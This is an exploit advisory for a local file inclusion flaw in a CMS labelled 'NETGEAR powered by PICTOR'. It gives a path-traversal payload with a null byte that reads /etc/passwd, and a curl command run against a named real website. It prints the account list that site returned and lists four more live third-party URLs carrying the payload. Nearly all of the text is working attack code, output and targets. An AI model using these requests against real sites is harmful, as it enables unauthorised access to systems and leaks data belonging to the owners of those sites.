CMS NETGEAR powered by PICTOR Local File Inclusion

[+] Local File Inclusion on CMS NETGEAR powered by PICTOR

[+] Date: 14/12/2016

[+] Risk: Medium

[+] CWE number: CWE-98

[+] Author: Felipe Andrian Peixoto

[+] Vendor Homepage: http://www.pictor.com.br/

[+] Contact: felipe_andrian@hotmail.com

[+] Tested on: Gnu/Linux

[+] Vulnerable File: index.php

[+] Exploit : 

	http://host/index.php?pag= [ Local File Inclusion ]

[+] Payload :

	"../../../../../../../../../../../../../etc/passwd"

[+] Example :

	felipe@andrian # echo "Local File Inclusion:";curl -s "http://acervocbncuritiba.com.br/index.php?pag=../../../../../../../../../../../../../etc/passwd%00" | grep :x
	Local File Inclusion:
	root:x:0:0:root:/root:/bin/bash
	bin:x:1:1:bin:/bin:/sbin/nologin
	daemon:x:2:2:daemon:/sbin:/sbin/nologin
	adm:x:3:4:adm:/var/adm:/sbin/nologin
	lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
	sync:x:5:0:sync:/sbin:/bin/sync
	shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
	halt:x:7:0:halt:/sbin:/sbin/halt
	mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
	uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
	operator:x:11:0:operator:/root:/sbin/nologin
	games:x:12:100:games:/usr/games:/sbin/nologin
	gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
	ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
	nobody:x:99:99:Nobody:/:/sbin/nologin
	dbus:x:81:81:System message bus:/:/sbin/nologin
	usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin
	avahi-autoipd:x:499:499:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
	vcsa:x:69:498:virtual console memory owner:/dev:/sbin/nologin
	rtkit:x:498:497:RealtimeKit:/proc:/sbin/nologin
	abrt:x:497:495::/etc/abrt:/sbin/nologin
	nscd:x:28:494:NSCD Daemon:/:/sbin/nologin
	tcpdump:x:72:72::/:/sbin/nologin
	avahi:x:496:491:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
	haldaemon:x:68:490:HAL daemon:/:/sbin/nologin
	openvpn:x:495:489:OpenVPN:/etc/openvpn:/sbin/nologin
	ntp:x:38:38::/etc/ntp:/sbin/nologin
	apache:x:48:488:Apache:/var/www:/sbin/nologin
	saslauth:x:494:487:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
	mailnull:x:47:486::/var/spool/mqueue:/sbin/nologin
	smmsp:x:51:485::/var/spool/mqueue:/sbin/nologin
	nm-openconnect:x:493:484:NetworkManager user for OpenConnect:/:/sbin/nologin
	sshd:x:74:483:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
	smolt:x:492:482:Smolt:/usr/share/smolt:/sbin/nologin
	pulse:x:491:481:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
	gdm:x:42:479::/var/lib/gdm:/sbin/nologin
	pictor:x:500:500:Pictor Desenvolvimento:/home/pictor:/bin/bash
	named:x:25:25:Named:/var/named:/sbin/nologin
	mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
	webalizer:x:67:478:Webalizer:/var/www/usage:/sbin/nologin

[+] PoC :

	http://acervocbncuritiba.com.br/index.php?pag=../../../../../../../../../../../../../etc/passwd%00
	http://tecnopisos.com.br/index.php?pag=../../../../../../../../../../../../../etc/passwd%00
	http://www.lucaldasbijoux.com.br/index.php?pag=../../../../../../../../../../../../../etc/passwd%00
	http://qualysul.com.br/index.php?pag=../../../../../../../../../../../../../etc/passwd%00